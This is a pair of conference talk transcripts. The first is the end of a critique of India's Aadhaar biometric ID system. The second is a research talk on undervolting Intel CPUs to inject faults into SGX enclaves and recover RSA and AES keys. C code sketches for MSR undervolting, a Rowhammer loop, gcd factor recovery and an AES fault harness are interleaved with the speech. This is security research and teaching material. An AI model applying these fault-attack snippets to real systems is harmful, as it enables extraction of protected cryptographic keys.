fingerprints and upload a picture of a god or a dog or whatever else. There have been Aadhaar numbers issued to cows, to trees, to gods, and nobody checks those documents. You can be anybody you feel like. You can also get around it by not submitting biometrics at all, because, well, there are people who don't have fingers, or who don't have eyes, or whose eyes won't scan, and what do you do about them? So in the technical design they offer a biometric exception; all it requires is an enrolment agent who is willing to accept that you have an exception and to feed that into the system. How many cases of fraud have happened using the exception route? Nobody knows. Out of the 1.25 billion enrolments that they claim, how many of these are fraudulent? Nobody knows, because nobody checks these documents; you can get a document in the name of a god if you like. Now it gets even more bizarre. This is from a news report, and this news report very conveniently published the Aadhaar number itself, the 12-digit number up at the top. Aadhaar numbers are supposed to be confidential, like credit card numbers: if you have the number, you can claim to have given welfare to someone, so you do not publish your number in public. So this went out in the press, and someone else built on it and got himself a gas connection with subsidies. So Lord Hanuman, the god, has an Aadhaar number and also buys cooking gas from the state. And I could just go on and on with these stories: any manner of fraud you want, it's in the system, it's been exploited. And the ultimate prize, obviously, is if you can steal the biometrics itself, and that too has happened. This is a case in the state of Uttar Pradesh where the police found a gang trading in stolen biometrics. There's a little side story over there: at the top they refer to them as a gang, and then below they become hackers. And this shift in
usage is not innocent. They use 'gang' to refer to low-intelligence thugs who operate on the street, and then they use the word 'hackers' to refer to people doing something at a higher level. In this case, this part became an extremely interesting story for us to investigate, because we discovered how bad the enrolment software itself was. When you enrol, the enrolment agent is required to first authenticate themselves and then accept an authentication on behalf of the individual who is trying to get enrolled, and the enrolment agent's ID is used to ensure there is a quality check, so that if there is fraud, you know who the source of the fraud was. It turns out that the enrolment client is built in Java, it's a bunch of JAR files, and the authentication module is a JAR file. If you do not want to authenticate, you replace that JAR file with something else that offers the same API but does not authenticate, and that's it, you enrol. That's the quality of the software. So when you bring these issues up with the UIDAI, this is what they do: they are the Ministry of Denial. Every single time you report a story like this and say we have discovered a data breach, we have discovered a vulnerability, we have discovered something going on, they say: the data that we have in our database is safe, it's your copy that's stolen. It's effectively this: the CIDR, the Central Identities Data Repository, remains safe and secure, nobody has managed to break in, nobody can use your Aadhaar number without authentication. That is the official response every single time you report a problem like this. It has gotten so bad that the former boss of the UIDAI, a man named Ram Sewak Sharma, who is currently the chairman of the Telecom Regulatory Authority, issued a public challenge saying: hack me, I guarantee you cannot. Now, this is incitement to a criminal act. It is also a violation of the law to publish your own Aadhaar number, but he's the boss, he does it, nobody says anything to him, and it's a statement of his privilege more than anything else. He went on to promise that he would not take action against anyone who hacks him, but how on earth does a private citizen offer you immunity against a criminal act? So obviously nobody took him up on it, and he went on to declare victory, and all we could do was make cartoons. Yes, we did; this literally was the only way to respond to a provocation like that. So once again you have to stop and ask: how is it possible for such utter incompetence to come out of a democracy? A democracy is supposed to have checks and balances that prevent this kind of thing from happening. How did this happen? One way to understand it is: maybe Aadhaar was never about welfare at all, maybe it was never about giving people identity, maybe it was always about the state wanting to make it convenient to identify people. And once you look at the timeline of Aadhaar, where did this project come from, how do you create a project that goes on to enrol a billion people? It can't happen just because people voluntarily came and said I love it, I'm signing up. It had to be forced on them. What forces them to do it? So the larger timeline is this, quite apart from where the project came from, and it goes back to 1999. That was the year when India went to war with Pakistan over a conflict in a region called Kargil, in the state of Jammu and Kashmir, and what the government of India figured was that some people from Pakistan had come into India, passed themselves off as Indian citizens, and caused this to happen. So you
can't let this happen, you can't have non-Indians wandering around the streets of India; how are you going to stop them? Well, the government's solution was: we're just going to enumerate every single resident of this country and find out whether they're Indian or not. So they called this project the National Population Register; it was meant to be a database of every single resident of India. This is after the 1999 incident, not recently. And then they had a second project called the National Register of Citizens, where you take the NPR data and go back and interrogate everyone and ask: are you Indian or not? With all 1.2 or 1.3 billion people. And then they lost the elections. So in 2004 they lose the elections, the project basically doesn't move forward, and the new government appoints a technocrat who gives it a new marketing spin, saying: look, this is not about surveillance at all, this is about welfare, and we're going to make people's lives better. And he goes on to create a fairly fantastic media profile, to the point where The Economist does PR for him. You saw what goes wrong with Aadhaar, everything that goes wrong, and this is The Economist last week essentially saying Africa should import this from India. It's The Economist; you can look it up. So you have one PR campaign running like this, about how it's all for welfare, and you have the government that sponsored this PR campaign, which went on to lose elections again, and the party that originally created the surveillance database in 1999 is back in power now, since 2014, and they're back on the original agenda. And so this month they passed what's called the Citizenship Amendment Act, which provides a path to citizenship of India if you are from Pakistan, Bangladesh or Afghanistan and you're not a Muslim. That's the condition: the act explicitly excludes Muslims from this path to citizenship. Now, this is very clearly a violation of the constitution of India. In fact Article 14, which is the shirt I'm wearing here, this is my protest shirt, essentially says that the state shall not deny equality before the law or the equal protection of the laws to any person within the territory of India. It is not restricted to citizens, it is applicable to all persons, and the act that has just been passed is a violation of the constitution. Now, they have a majority in government, they can do what they please, because there is literally no opposition to stop them, which leaves it up to the people. And as a result of this there have been protests all over India for the last month; here is a sample of news reports. There have been millions of people on the streets of India, marching in protest. Most people have not figured out that this is actually based on Aadhaar, because Aadhaar is the marketing term for the project that is meant to survey and separate the people of India into citizens and non-citizens based on their religion. So, this is very dense; this is from protests yesterday morning. Thank you, Kiran. We have some time for questions, so please line up behind the microphones, and we also have signal angels who will pass on the questions from the Internet. We're going to take one right now: were there any data leaks when the guy posted his number on Twitter? Well, there have been multiple data leaks. I'll point you to a fairly interesting one. The chairman of the UIDAI, Mr Nandan Nilekani, thought so little about data leaks that he published his Aadhaar number online many years ago, and after subsequently being told that maybe this is not the best idea for the chairman of the entity to leak his own number, he finally deleted it. But the
internet never forgets, and you can find it on Stack Overflow today. You just go to Stack Overflow, search for Nandan Nilekani, and you will find his Aadhaar number. Consequences of leaks? Yes; in fact, the estimate of the total number of Aadhaar numbers that have leaked in public is well past 200 million. Thank you. Microphone number two, please. Yeah, first of all, thanks for the talk. I think that civil registries and public databases, or public-service databases of citizens, are definitely a topic that we should discuss here more. The problem with this one is very, very obvious, but I'd just like to mention that many of the privileges that we as a community, having grown up in a Western, let's say, stable democracy, derive from having a birth certificate and being able to get an identity, even if it's just one on paper. And there is a question coming, right? Yes, I would like to ask one thing: why don't they use the paper that is being sent out as a form of identification, like we have with our ID cards? For the simple reason that they really believe in this vision and they do not want people using paper cards. But also, in terms of whether this was the first ID: you know, India doesn't have comprehensive birth registration. The UIDAI answered this question under the Right to Information Act, which is like the equivalent of the US Freedom of Information Act, and in 2015 they explained how many enrolments happened against existing documents versus the person not having any documents at all, and the rate was that 99.5 percent had at least two documents proving their ID. So this idea that it gave an ID to people who did not have one is completely false, as per their own admission. Thank you. Microphone number one. Do you generally oppose the idea of a central identification number, or just the implementation by a flailing state like India? That's a slightly loaded question. So, the state always makes a huge difference, the quality of the institutions of a state makes a huge difference. I was in fact having a discussion with someone here yesterday who pointed out that distrust of centralized ID seems to be a Commonwealth phenomenon: the UK doesn't have one, the US doesn't have one, but Germany seems to have one, and most civil-law jurisdictions seem to be okay with the idea of a centralized ID as long as it is well regulated. So yes, the nature of the government makes a huge difference, and I would say I can't speak of the technology being good or bad separately from whether the governance of it is good or bad. Thank you. Microphone number two. Hi Kiran, thanks a lot for the talk. If I'm not wrong, a few months ago, maybe a year ago, I read about this big democracy event going on in India. Now, there are a few countries that are considering using ID for elections, to avoid fraud and that sort of thing, and I come from a country that has been trying really hard to implement an ID system that is reliable and that helps to combat fraud in elections. Do you think this ID system can somehow be reformed to make the whole democratic process easier? In India we have a case study of this, fortunately, so I don't need to speak from theory. We had a state called Andhra Pradesh, which split into two separate states, now called Andhra Pradesh and Telangana, and part of what happens when you split a state is that you now have separate elections for each state, and so you need to know who the voters of your state will
now be in the new state. Previously you had one voter database for your entire state; now you have two separate voter databases, and you need to know which person is in which state. So for the process of separating the database, they went ahead and collected Aadhaar numbers, and they ended up deleting a significant fraction of the voter database, because they couldn't prove that those people were residents of the state. Assam is a different story, but the Andhra Pradesh and Telangana story is particularly illustrative of how, if you think you can bring in a technological solution, you are probably going to make it worse; in fact, you are guaranteed to make it worse. Thank you. Kiran Jonnalagadda, a round of applause. Thank you.
Aadhaar is India's national biometric identity database, with over one billion records comprising fingerprints, iris scans and basic demographic information. It is presented as identity technology, allowing an individual to identify themselves, but also as an identification technology, allowing the state to see an individual, identify fraudulent welfare beneficiaries, and thus realise savings. These claims are not complementary. They are in fact contradictory, compromising each other. If one must be true, the other must somehow be false, and this is the reality of Aadhaar. This talk will demonstrate how Aadhaar's attempt to be a cure for all kinds of ailments has in fact resulted in large scale exclusion and fraud. We will look at a series of design assumptions in Aadhaar's architecture, the gaps in them, and then examples of how these gaps were exploited, from public news reports. Aadhaar is often touted as a revolutionary technology that has simultaneously given identity to billions and realised substantial savings from fraud for the government. These utopian visions are finding buyers around the world. Jamaica, Morocco and Kenya have all adopted projects inspired by Aadhaar, and more countries are following suit. Unfortunately, Aadhaar is not magic, and there is now an urgent need for a sober understanding to be taken worldwide. The Kaarana project began in 2017 as a collaboration between programmers and lawyers, to document architectural assumptions and their impact on human rights. The project's findings were presented as evidence to the Supreme Court of India in 2018, and are acknowledged in a scathing dissent by Justice Chandrachud (September 2018). This dissent was in turn cited by the Supreme Court of Jamaica to shut down a biometric identity program in that country (April 2019). In September 2019, Kaarana member Anand Venkatanarayanan also appeared as a witness in the Supreme Court of Kenya in a petition against Huduma Namba, the Kenyan biometric identity program. We hope that this presentation at CCC will help public interest technologists from around the world prepare for a critical examination of similar programs in their countries.
10.5446/53143 (DOI)
Welcome to our next talk. It's called Flipping Bits from Software Without Rowhammer. As a reminder, Rowhammer is a software-based fault attack; it was published in 2015, countermeasures were developed, and we are still deploying these everywhere. Now our two speakers are going to talk about a new software-based fault attack that can induce faults even inside the SGX environment. Our speakers are Daniel Gruss from Graz University of Technology and Kit Murdock, researching at the University of Birmingham. The content of this talk is actually in her first published paper, accepted at IEEE Security and Privacy next year; in case you do not come from the academic world, that is a big deal for a first paper. Please welcome both with a round of applause and enjoy the talk. Hello. Let's get started. This is my favourite recent attack. It's called CLKSCREW, and the reason it's my favourite is that it created a new class of fault attacks. Fault attacks? I know those: you take an oscilloscope, check the voltage line, and then you drop the voltage, right? Now, you see, this is why this one is cool: you don't need any equipment at all. Adrian Tang created this wonderful attack that uses DVFS. What's that? Don't violate format specifications? I asked my boyfriend this morning what he thought DVFS stood for and he said Darth Vader fights Skywalker; I'm wearing his T-shirt especially for him. Maybe this is more technical: dazzling vaults for security, like SGX? No, it's not that either. The one I came up with this morning was drink vodka, feel silly. It's not that either. It stands for dynamic voltage and frequency scaling, which means changing the voltage and the frequency of your CPU. Why would anyone want to do this? Well, gamers want fast computers; I'm sure there are a few people out here who want a really fast computer. Servers want high assurance and low running costs. And what do you do if your hardware gets hot? You are going to need to adjust these settings. Finding a voltage and frequency that work together is pretty difficult, so to make this easier the manufacturers have created a way to do it from software: they created memory-mapped registers. You modify these from software and it has an impact on the hardware. That's what this wonderful CLKSCREW attack used. They found something else out, too. You may have heard of TrustZone. TrustZone is an enclave on ARM chips that should be able to protect your data. But if you can modify the frequency and voltage of the whole core, then you modify it for both TrustZone and normal code. This was their attack: from software, they modified the frequency to take it outside of the normal operating range and induced faults. On an ARM chip running in a mobile phone, they managed to get an AES key out of TrustZone. You should not be able to do that. They were also able to trick TrustZone into loading a self-signed app. You should not be able to do that either. That made this ARM attack really interesting. This year another attack came out, called VoltJockey. This also attacked ARM chips, but instead of looking at frequency on ARM chips, they were looking at voltage on ARM chips. And then they were thinking: what about Intel? Okay, so Intel. Actually, I know something about Intel, because I had this nice laptop from HP. I really liked it, but it had this problem that it was getting too hot all the time.
I couldn't even work without it shutting down all the time because of the heat problem. So what I did was undervolt the CPU, and this actually worked for me: I used it undervolted for several years. You can also see this effect in this comparison I took from somewhere on the Internet, with and without undervolting: the benchmark score improves with undervolting because you don't run into thermal throttling as often. There are different tools to do that. On Windows you could use RMClock, and there's also ThrottleStop. On Linux there's the linux-intel-undervolt GitHub repository. There's one more, actually: Adrian Tang, who, as you may have noticed, I'm a bit of a fan of and who was the lead author on CLKSCREW, wrote his PhD thesis, and in the appendix he talked about undervolting on Intel machines and how you do it. I wish I had read that before I started the paper; it would have saved me an awful lot of time. And thank you to the people on the Internet for making my life a lot easier, because what we discovered was that there is this magic model-specific register, called 0x150, which enables you to change the voltage. The people on the Internet had done the work for me, so I know how it works. You first tell it, via the plane index, what it is you want to change; we discovered that the core and the cache are on the same voltage plane, so you have to modify them both together, otherwise it has no effect. And then you set the offset to say: I want to raise or lower the voltage by this much. So I thought, let's have a go, let's write a little bit of code. Here is the code. The smart people amongst you may have noticed something: even with my appalling C, even I would recognize that that loop should never exit. I'm just multiplying the same thing again and again and again and expecting it to exit. That shouldn't happen. But let's look at what happened. So I'm going to show you what I did. The first thing I do is set the frequency, because I'm going to play with the voltage, and if I'm going to play with voltage I want the frequency to be fixed. That's quite easy using cpupower: you set the maximum and the minimum to 1 GHz, and my machine is now running at exactly 1 GHz. Now we'll look at the bit of code that you need to undervolt; again, I didn't do the work, thank you to the people on the Internet for doing this. You load the msr module into the kernel. Let's have a look at the code. Does that look all right? Oh, it does, it looks much better up there. Yes, it's that one line of code: that is the one line of code you need to open the MSR. Then we're going to write to it. (Why is it doing that? We have a touch-sensitive screen here; I won't touch it again.) That's the line of code that opens it, and that's how you write to it; again, the people on the Internet did the work and told me how I had to write that. What we're going to do here is just undervolt while multiplying 0xDEADBEEF by this really big number. I'm starting at minus 252 millivolts, and we're just going to see if I ever get out of this loop. But surely the system would just crash, right? You'd hope so, wouldn't you? Let's see. There we go: we got a fault. I was a bit gobsmacked when that happened, because the system didn't crash. That doesn't look too good.
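The loop being demoed above can be reproduced with a small self-contained C sketch like the following. It assumes the undervolt has already been applied; it simply repeats the same multiplication, compares against the known-correct product, and prints which bits flipped when the result first differs. The specific second operand is an arbitrary "really big number" chosen here for illustration, not the value used in the talk.

#include <stdint.h>
#include <stdio.h>

int main(void) {
    /* volatile so the compiler cannot fold the multiplication away */
    volatile uint64_t a = 0xDEADBEEFull;
    volatile uint64_t b = 0x1122334455667788ull;
    const uint64_t expected = 0xDEADBEEFull * 0x1122334455667788ull;

    for (uint64_t i = 0; ; i++) {
        uint64_t r = a * b;   /* computed at runtime on the undervolted core */
        if (r != expected) {
            printf("fault after %llu iterations: got %016llx, expected %016llx, "
                   "flipped bits %016llx\n",
                   (unsigned long long)i, (unsigned long long)r,
                   (unsigned long long)expected,
                   (unsigned long long)(r ^ expected));
            return 1;
        }
    }
}

At nominal voltage this loop never exits, which is the joke in the talk; with a sufficient undervolt it eventually returns, reporting a small cluster of adjacent flipped bits in the product.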
So the question is: what undervolting is actually required to get a bit flip? We did a lot of tests. We didn't just multiply 0xDEADBEEF; we also multiplied random numbers. Here I'm going to generate two random numbers, one up to 0xFFFFF and one up to 0xFFF, and I'm going to try different amounts of undervolting to see if I get different bit flips. Again, I got the same bit flip; I'm getting the same single bit flip there. Maybe it's only ever going to be one bit flip? No: now I got a different bit flip. And again a different bit flip. You'll notice the flipped bits always appear to be next to one another. And to answer Daniel's question: I crashed my machine a lot in the process of doing this. I wanted to know what good values to undervolt at were, and here they are. For each frequency we recorded the base voltage and the point at which we got the first fault. Once we had done that, everything became really easy: we just made sure we didn't go below that point and end up with a kernel panic or the machine crashing. This is already great; I think this looks like it is exploitable. And the first thing that you need when you are working on a vulnerability is the name and the logo, and maybe a website and everything like that. People on the Internet agree with me; this tweet, yes: we need a name and a logo. Go on then, what's your idea? I thought, this is like Rowhammer, we are flipping bits, but with voltage, so I call it Volthammer, and I already have a logo for it. We're not giving it a logo. I think we need a logo, because people relate more to images; reading a word is much more complicated than seeing a logo somewhere. It's better for communication; it makes it easier to talk about your vulnerability. The name, same thing. How would you like to call it? Undervolting on Intel to induce flips in multiplications to then run an exploit? No, that's not a good vulnerability name. Speaking of the name: if we choose a fancy name, we might even make it into TV shows, like Rowhammer. 'The hacker used a DRAM Rowhammer exploit to gain kernel privileges. Hey, Chuck, I've got something for you.' This was in Designated Survivor in March 2018; this guy just got shot. Hopefully we won't get shot. Actually, my group has also been working on Rowhammer and presented this in 2015 here at CCC, in Hamburg back then. It was Rowhammer.js, and we called it root privileges for web apps because we showed that you can do this from JavaScript in a browser. It looks pretty much like this: we hammer the memory a bit and then we see bit flips in the memory. How does this work? Because the only other software-based fault attacks that we know of are the DVFS-related ones, and this is a different effect. What we do here is look at the DRAM. The DRAM is organized in multiple rows, and we access these rows. The rows consist of so-called cells, each a capacitor and a transistor, and each stores one bit of information. The row size is usually something like 8 kilobytes, and when you read something, you copy it to the row buffer: you read from a row, you copy it to the row buffer. The problem now is that these capacitors leak over time, so you need to refresh them frequently, and there is a maximum refresh interval defined in the standard to guarantee data integrity.
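Mechanically, the undervolting used in these experiments is applied by writing a 64-bit command to MSR 0x150, as described a bit earlier. Below is a hedged C sketch of the write itself through the Linux msr driver. The value passed in must encode the plane index (core or cache), a write-request flag and the signed voltage offset; that bit layout is documented by community projects such as linux-intel-undervolt and is deliberately not reproduced here, so treat the constants you feed into this helper as something to verify independently.

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

/* Write one 64-bit value to a model-specific register on CPU 0 through the
 * Linux msr driver ('modprobe msr' first, run as root). For the undervolting
 * in the talk, 'msr' is 0x150 and 'value' encodes plane index, write flag
 * and voltage offset. */
int wrmsr_on_cpu0(uint32_t msr, uint64_t value) {
    int fd = open("/dev/cpu/0/msr", O_WRONLY);
    if (fd < 0) {
        perror("open /dev/cpu/0/msr");
        return -1;
    }
    /* the file offset selects which MSR is written */
    ssize_t n = pwrite(fd, &value, sizeof(value), msr);
    close(fd);
    return n == (ssize_t)sizeof(value) ? 0 : -1;
}

As the talk notes, the core and cache planes have to be given the same offset for the undervolt to take effect, so in practice this write is issued once per plane.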
The problem is that cells leak fast upon proximate accesses, and that means if you access two locations in proximity to a third location, then the third location might flip a bit without accessing it. This has been exploited in different exploits, so the usual strategies, maybe we can use some of them. The usual strategies here are searching for a page with a bit flip, so you search for it. Then you find some R. There is a flip here. Then you release the page with the flip in the next step. This memory is free. Now you allocate a lot of target pages, for instance, page tables. Then you hope that the target page is placed there. If it's a page table, for instance, like this, and you induce a bit flip, so before it was pointing to user page, then it was pointing to no page at all because we maybe unmapped it. The page that we induce the bit flip now is actually the one storing all the PTEs here, so the one in the middle stored down there. This one now has a bit flip, and then our pointer to our own user page changes due to the bit flip and points to, hopefully, another page table because we filled the memory with page tables. Another direction that we could go here is flipping bits in code. For instance, if you think about a password comparison, you might have a jump equal check here, and a jump equal check, if you flip one bit, it transforms into a different instruction, and fortunately, oh, this already looks interesting, ah, perfect, changing the password check into a password incorrect check. I will always be rude. And yeah, that's basically it. So these are two directions that we might look at. For Rohammer, that's also maybe a question. For Rohammer, why would we even care about other fault attacks? Because Rohammer works on DDR3, it works on DDR4, it works on ECC memory. How does it deal with SGX? Yeah, SGX, yes. So maybe we should first explain what SGX is. SGX is a so-called TE, trusted execution environment on Intel processors, and Intel designed it this way that you have an untrusted part, and this runs on top of an operating system inside an application. And inside the application, you can now create an enclave. And the enclave runs in a trusted part which is supported by the hardware. The hardware is the trust anchor for this trusted enclave. And the enclave, now, you can, from the untrusted part, you can call into the enclave via a call gate pretty much like a system call, and in there, you execute a trusted function. Then you return to this untrusted part, and then you can continue doing other stuff. And the operating system has no direct access to this trusted part. This is also protected against all kinds of other attacks, for instance, physical attacks. If you look at the memory that it uses, maybe I have 16 gigabytes of RAM, then there is a small region for the EPC, the enclave page cache, the memory that enclaves use. And it's encrypted and integrity protected, and I can't temper with it. So for instance, if I want to mount a cold boot attack, pull out the DRAM, put it in another machine, and read out what content it has, I can't do that because it's encrypted and I don't have the keys and the processor. Quite bad. So what happens if we have bit flips in the EPC? Good question. We tried that. The integrity check fails. It locks up the memory controller, which means no further memory accesses whatsoever run through this system. Everything stays where it is, and the system hards, basically. It's no exploit, it's just denial of service. So maybe XGX can save us. 
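For comparison, the DRAM access pattern behind Rowhammer that the speakers summarize looks roughly like this. It is a bare-bones sketch: finding two addresses that map to different rows of the same bank, and spraying page tables afterwards, are the hard parts and are left out here.

```c
/* Sketch: the classic Rowhammer inner loop (x86, GCC/Clang inline asm). Two addresses
 * in different rows of the same DRAM bank are read repeatedly, with clflush forcing
 * every access out to DRAM so the aggressor rows are actually activated each time. */
#include <stdint.h>

static void hammer(volatile uint8_t *row_a, volatile uint8_t *row_b, unsigned long rounds)
{
    while (rounds--) {
        (void)*row_a;                                   /* activate aggressor row A */
        (void)*row_b;                                   /* activate aggressor row B */
        asm volatile("clflush (%0)" :: "r"(row_a) : "memory");
        asm volatile("clflush (%0)" :: "r"(row_b) : "memory");
    }
}
```

Bits in a victim row in between may then flip without ever being written, which is what the page-table spraying strategy described above turns into a privilege escalation, and what SGX's integrity check turns into a lock-up of the memory controller instead.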
So what I want to know is, ROHama clearly failed because of the integrity check, is my attack where I can flip bits, is this going to work inside SGS? I don't think so because they have the integrity protection, right? So what I'm going to do is run the same thing. In the right-hand side is user space, and in the left-hand side is the enclave. As you can see, I'm running it at minus 261 millivolts. No error. Minus 262. No error. Minus two. Fingers crossed, we don't get a kernel panic. Do you see that thing at the bottom? That's a bit flip inside the enclave. Oh, yeah. That's bad. Thank you. Yeah. And it's the same bit flip that I was getting in user space. That is also really interesting. I have an idea. So it's surprising that it works, right? But I have an idea. This is basically doing the same thing as clock screw, but on SGX, right? And I thought maybe you didn't like the previous logo. Maybe it was just too much. So I came up with something more simple. He's come up with a new name. Yes, SGX screw. How do you like it? No. We don't even have an attack. We can't have a logo before we have an attack. The logo is important, right? I mean, how would you present this on a website without a logo? Well, first of all, I need an attack. What am I going to attack with this? I have an idea what we could attack. So for instance, we could attack crypto. RSA. RSA is a crypto algorithm. It's a public key crypto algorithm. And you can encrypt or sign messages. You can send this over an untrusted channel. And then you can also verify. So this is actually a type which should be decrypt there. But verify messages with a public key or decrypt sign messages with a private key. So how does this work? Yeah, basically, it's based on exponentiation modulo a number. And this number is computed from two prime numbers. So for the signature part, which is similar to the decryption, basically, you take a hash of the message and then take it to the power of d modulo n, the public modulos. And then you have the signature. And everyone can verify that this is actually later on, can verify this, because the exponent part is public. So n is also public, so we can later on do this. Now there is one optimization which is quite nice, which is Chinese remainder theorem. And this part is really expensive. It takes a long time. So it's a lot faster if you split this in multiple parts. For instance, if you split it in two parts, you do two of those exponentiations, but with different numbers, with smaller numbers, and then it's cheaper. It takes fewer rounds. And if you do that, you, of course, have to adapt the formula up here to compute the signature, because you now put it together out of the two pieces of the signature that you compute. Okay. So this looks quite complicated, but the point is we want to mount a fault attack on this. So what happens if we fault this? Let's assume we have two signatures which are not identical, right, s and s prime. And we basically only need to know that in one of them a fault occurred. So the first is something, the other is something else. We don't care. But what you see here is that both are multiplied by q plus s2. And if you subtract one from the other, what do you get? You get something multiplied with q. There is something else that is multiplied with q, which is p, and n is public. So what we can do now is we can compute the greatest common divisor of this and n and get q. Okay. 
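The punchline of this CRT fault attack (usually credited to Boneh, DeMillo and Lipton, with the gcd trick attributed to Lenstra) fits in a few lines: if the fault hits only one of the two half-exponentiations, then s minus s' is divisible by exactly one of the secret primes, so gcd(s - s', n) reveals it. The sketch below assumes you already have one correct and one faulted signature of the same message; it uses GMP, and the names are ours.

```c
/* Sketch: recover the RSA factors from one correct signature s and one faulted
 * signature s_bad of the same message, as in the Bellcore/Lenstra-style attack
 * the speakers apply. Build with -lgmp. */
#include <gmp.h>
#include <stdio.h>

void recover_factors(const mpz_t s, const mpz_t s_bad, const mpz_t n)
{
    mpz_t diff, q, p;
    mpz_inits(diff, q, p, NULL);

    mpz_sub(diff, s, s_bad);   /* s - s' vanishes modulo only one of the primes    */
    mpz_gcd(q, diff, n);       /* so gcd(s - s', n) is a non-trivial factor of n   */
    mpz_divexact(p, n, q);     /* and the other prime is n divided by it           */

    gmp_printf("q = %Zd\np = %Zd\n", q, p);
    mpz_clears(diff, q, p, NULL);
}
```

From p and q the private exponent can be recomputed from the public exponent, which is why a single faulty signature leaking out of the enclave is enough.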
So I'm interested to see if I didn't understand the word of that, but I'm interested to see if I can use this to mount an attack. So how am I going to do this? I'll write a little RSA decrypt program. And what I'll do is I'll use the same bit of multiplication that I've been using before. And when I get a bit flip, then I'll do the decryption. All this is happening inside SGX, inside the enclave. So let's have a look at this. First of all, I'll show you the code that I wrote. Again copied from the internet. Thank you. So there it is. I'm going to trigger the fault. I'm going to wait for the trigger of fault. Then I'm going to do a decryption. Let's have a quick look at the code, which should be exactly the same as it was right at the very beginning when we started this. Yeah, there's my dead beef. Written slightly differently, but there's my dead beef. So now this is ever so slightly messy on the screen, but I hope you're going to see this. So minus 239, fine. Still fine. Still fine. I'll just pause there. You can see at the bottom I've written, meh, all fine, if you're wondering. So what we're looking at here is a correct decryption. And you can see inside the enclave, I'm initializing p and I'm initializing q. And those are part of the private key. I shouldn't be able to get those. So 239 isn't really working. Let's try going up to minus 240. Oh, oh, oh, oh, oh. RSA error. RSA error. That's exciting. Okay, so this should work for the attack then. So let's have a look again. I copied somebody's attack on the internet where they very kindly, it's called the Lenshtra attack. And again, I got an output. I don't know what it is because I didn't understand any of that crypto stuff. But let me have a look in the source code and see if that exists anywhere in the source code inside the enclave. It does. I found p. If I found p, I can find q. So just to summarize what I've done, from a bit flip, I have got the private key out of the SGX enclave. And I shouldn't be able to do that. Yes, yes. And I think I have an idea. So you didn't like the previous... Oh, I know where this is going. Yes. You didn't like the previous main. So I came up with something more cute and relatable, maybe. So I thought this is an attack on RSA. So I called it Mufasa. My undervolting fault attack on RSA. That's not even a logo. That's just a picture of a lion. It's sort of a... Disney aren't going to let us use that. Or is it Star Wars now? I don't know. Okay. Okay. So, Daniel, I really enjoyed... I don't think you will like any of the names I suggest, right? Probably not. But I really enjoyed breaking RSA. So what I want to know is, what else can I break? Well... It makes something else so I can break. If you don't like the RSA part, we can also attack other crypto. I mean, there is AES, for instance. AES is a symmetric key crypto algorithm. Again, you encrypt messages, you transfer them over a public channel, this time with both sides having the key. And you can also use that for storage. AES internally uses a 4 times 4 state matrix for... 4 times 4 bytes. And it runs through 10 rounds, which are S-box, which basically replaces a byte by another byte. Some shifting of rows in this matrix, some mixing of the columns, and then the round key is added, which is computed from the AES key that you provide to the algorithm. 
And if we look at the last three rounds, because we want to again mount a fault attack, and there are differential fault attacks on AES, if you look at the last rounds, because the way of this algorithm works is it propagates changes, differences through this algorithm. If you look at the state matrix, which only has a difference in the top left corner, then this is how the state will propagate through the ninth and tenth round. And you can put up formulas to compute possible values for the state up there. If you have different... If you have encryptions, which only have a difference there in exactly that single state byte. Hmm. Now, how does this work in practice? Well, today everyone is using AES and I, because that's per fast. And again, an instruction set extension by Intel, and it's super fast. Oh, okay. I want to have a go. Right. So let me have a look if I can break some of these AES new instructions. So I'm going to come at this slightly differently. Last time I waited for a multiplication fault, I'm going to do something slightly different. What I'm going to do is put in a loop to AES encryptions, and I wrote this using Intel's code. I should say, I, we, we wrote this using Intel's code. Intel's code, this should never fault. And we know what we're looking for. What we're looking for is a fault in the eighth round. So let's see if we get faults with this. So the first thing is I'm going to start at 2 minus 262 millivolts. What's interesting is that you have to undervolt more when it's cold. So you can tell at what time of day I ran these. Oh, I got fault. I got fault. Oh. I got fault. I actually, where did that? That's actually in the fourth round. I'm, I'm, I'm, I'm, I'm fifth round. I can't do anything with that. You can't do anything again in the fifth round. Can't do anything with that. Um, fifth round again. Oh, oh, we got one. We got one in the eighth round. And so it means I can take these two ciphertexts and I can use the differential fault attack. Um, I actually ran this twice in order to get two pairs of faulty output, um, because it made it so much easier. And again, thank you to somebody on the internet for having written a differential fault analysis attack for me. You don't, you don't need to, but it just makes it easy for the presentation. So I'm now going to compare, let me just pause there a second. Um, I used somebody else's differential fault attack and it gave me in one, for the first pair it gave me 500 keys, possible keys. And for the second, it gave me 200 possible keys. I'm overlapping them. And there was only one key that matched both. And that's the key that came out. And let's just again check inside the source code. Does that key exist? What is the key? And yeah, that is the key. So again, that's not a very good key though. No, I think if you think about randomness, it's as good as any other anyway. Uh, what have I done? I have flipped a bit inside SGX to create a fault in AES new instruction set that has enabled me to get the AES key out of SGX. I shouldn't be able to do that. So, so now that we have multiple attacks, we should think about a logo and a name, right? This one better be good because the other one wasn't very good. No, seriously, we are, we are already soon, we are, we will write this up, send this to conference, people will like it, right? This is, and I already have a name and a logo for it. Come on then. Crypto vault screw hammer. 
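The "two encryptions in a loop" harness the speakers describe can be sketched directly with the AES-NI intrinsics (compile with -maes). The round keys are assumed to be expanded elsewhere, and this is not the exact enclave code from the talk; it only shows why a mismatch between the two ciphertexts is, by construction, a hardware fault that can be fed to the differential fault analysis.

```c
/* Sketch: encrypt the same block twice with the same AES-128 round keys and
 * compare. With correct voltage the outputs are always identical, so any
 * difference is an induced fault; pairs faulted in round 8 are the ones the
 * differential fault analysis needs. */
#include <wmmintrin.h>   /* AES-NI intrinsics */
#include <string.h>

static __m128i aes128_encrypt(__m128i block, const __m128i rk[11])
{
    block = _mm_xor_si128(block, rk[0]);            /* initial AddRoundKey */
    for (int round = 1; round < 10; round++)
        block = _mm_aesenc_si128(block, rk[round]); /* rounds 1..9         */
    return _mm_aesenclast_si128(block, rk[10]);     /* final round 10      */
}

/* Returns 1 and fills out[0], out[1] when a faulty ciphertext pair was caught. */
int catch_faulty_pair(const __m128i rk[11], __m128i plaintext, __m128i out[2])
{
    __m128i c1 = aes128_encrypt(plaintext, rk);
    __m128i c2 = aes128_encrypt(plaintext, rk);
    if (memcmp(&c1, &c2, sizeof c1) != 0) {
        out[0] = c1;
        out[1] = c2;
        return 1;
    }
    return 0;
}
```

As in the talk, two such pairs were enough: each pair narrows the last round key to a few hundred candidates, and intersecting the candidate sets leaves a single key.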
